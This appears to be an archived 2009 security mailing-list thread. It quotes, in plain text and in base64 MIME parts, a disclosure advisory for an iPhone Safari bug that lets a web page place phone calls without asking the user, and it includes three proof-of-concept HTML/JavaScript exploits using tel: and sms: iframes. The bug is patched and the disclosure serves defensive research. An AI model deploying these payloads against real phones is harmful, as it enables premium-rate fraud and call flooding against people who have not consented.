PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
